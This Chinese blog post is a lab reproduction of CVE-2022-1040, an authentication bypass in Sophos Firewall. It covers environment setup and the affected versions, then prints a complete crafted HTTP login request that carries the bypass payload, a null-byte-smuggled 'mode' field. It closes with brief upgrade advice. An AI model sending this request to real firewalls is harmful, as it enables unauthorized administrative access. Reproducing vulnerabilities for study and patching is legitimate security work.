CVE-2022-1040 Sophos Firewall 服务架构与认证绕过漏洞复现

已于 2022-10-25 09:23:29 修改
阅读量1.5k 收藏 2
点赞数 1
分类专栏: 漏洞复现【Free】 文章标签: 1024程序员节 网络安全 安全威胁分析
于 2022-10-24 22:01:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/127502903
版权

 

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Vulfocus环境搭建:

漏洞环境搭建:

下载镜像包:

导入虚拟化:

0x06 漏洞复现:

0x07 流量分析:

0x08 修复建议:

0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

    Sophos是提供“安全技术”的世界级领导者,为商业机构、教育机构和政府机构提供防御病毒、间谍软件和广告等垃圾邮件的完整解决方案,使这些客户免遭病毒和垃圾邮件的侵害。

0x03 漏洞概述:

        Sophos Firewall爆出了一个认证绕过漏洞CVE-2022-1040 。

0x04 影响版本:

        Sophos  Firewall  v18.5 MR3(18.5.3) 及以下版本

0x05 环境搭建:

Vulfocus环境搭建:

参考这篇文章:

https://blog.csdn.net/qq_44281295/article/details/127022162

漏洞环境搭建:

下载镜像包:

18.5_MR1版本地址:

链接:https://pan.baidu.com/s/1tj6vZqOG4Nk3UxzxpsE3og?pwd=zlsm

提取码:zlsm

导入虚拟化:

选择红框内容导入

0x06 漏洞复现:

Burp改包:

POST /webconsole/Controller HTTP/1.1
Host: 192.168.119.242:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: https://92.168.119.242:4444
Referer: https://92.168.119.242:4444/webconsole/webpages/login.jsp
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded

mode=151&json={"username"%3a"admin","password"%3a"password","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066

0x07 流量分析:

        流量是TLS的比较麻烦。

0x08 修复建议:

根据官网升级至安全版本。

参考链接:

https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce

Kang_Sec
关注
专栏目录
Ivanti VPN RCE漏洞复现CVE-2024-21887)
0xSec
01-18 2325
Ivanti Connect Secure (9.x, 22.x) 和Ivanti Policy Secure (9.x, 22.x) 的web组件中存在身份验证绕过漏洞CVE-2023-46805)和命令注入漏洞CVE-2024-21887),成功利用该漏洞链允许远程未经认证的攻击者以root权限执行任意操作系统命令,导致服务器失陷。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-1040 Sophos Firewall 服务架构认证绕过漏洞分析之旅
include_voidmain的博客
07-21 1718
CVE-2022-1040 Sophos Firewall 服务架构认证绕过漏洞分析之旅
Sophos 修复位于 Sophos Web Appliance 设备中的三个漏洞
smellycat000的专栏
04-11 1153
聚焦源代码安全,网罗国内外最新资讯!作者:Pierluigi Paganini编译:代码卫士Sophos 修复了位于 Sophos Web Appliance 中的三个漏洞,其中一个是可导致代码执行的严重漏洞 CVE-2023-1671(CVSS 评分9.8)。CVE-2023-1671 是一个预认证命令注入漏洞,位于 warn-proceed 句柄中,影响早于 4.3.10.4 的版本。Sop...
Sophos UTM WebAdmin存在未明漏洞
weixin_30659829的博客
09-02 269
www.169it.com Sophos UTM WebAdmin存在未明漏洞详情如下: CNVD-ID CNVD-2013-131...
CVE-2024-0603 漏洞复现
最新发布
Jay17的博客
07-02 763
CVE-2024-0603 漏洞复现
Sophos 紧急修复已遭利用的防火墙 0day
smellycat000的专栏
04-26 783
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本周六,网络安全公司Sophos发布紧急安全更新,修复在其XG企业防火墙产品中已遭在野利用的一个0day。Sopho...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
Sophos 修复严重的防火墙 RCE 漏洞
smellycat000的专栏
03-28 1437
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Sophos 修复了位于 Sophos 防火墙产品中的一个远程代码执行漏洞 (CVE-2022-1040)。该认证绕过漏洞位于 Sophos Firewall 的 User Portal 和 Webadmin区域。位于web管理控制台中的RCE上周五,Sophos 披露了影响 Sophos Firewall 版本 18....
网康科技-下一代防火墙存在任意命令执行漏洞【附POC】
Liyu_6618的博客
02-07 458
网康科技-下一代防火墙存在任意命令执行漏洞【附POC】
网康下一代防火墙RCE漏洞
maverickpig的博客
05-26 1056
网络安全自学日志-漏洞复现篇:网康下一代防火墙RCE漏洞 使用需知 由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。 一、漏洞描述 防火墙使用linux进行开发的,可以使用echo xxx >123.txt这样的方式写入文件。 当文件生成目录在网站根目录下就可以直接访问 二、漏洞影响 奇安信 网康下一代防火墙 三、漏洞复现 存在漏洞的路径为 POST /directdata/direct/router
春秋云镜 CVE-2022-0410
qq_22002773的博客
08-13 856
春秋云镜 CVE-2022-0410
[春秋云镜]CVE-2022-23316
niubi707的博客
11-29 742
春秋云镜CVE-2022-23316
CVE-2019-1040 原理及复现
weixin_44747030的博客
10-07 2508
CVE-2019-1040漏洞复现
Linux内核提权漏洞CVE-2022-0874 复现
weixin_48421613的博客
03-08 892
官方漏洞通告: https://access.redhat.com/security/cve/cve-2022-0847 受影响的版本: 5.8<=Linux kernel<5.16.11/5.15.25/5.10.102​ ​ 复现过程如下: 首先我的exp是在github上下载的 https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit. 访问不了的可以公众号回复 0005即可获取exp 我这里使用的测试机器是kali2022
Zabbix登录绕过漏洞复现(CVE-2022-23131)
MrHatSec的博客
04-06 6402
Zabbix登录绕过漏洞复现(CVE-2022-23131)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值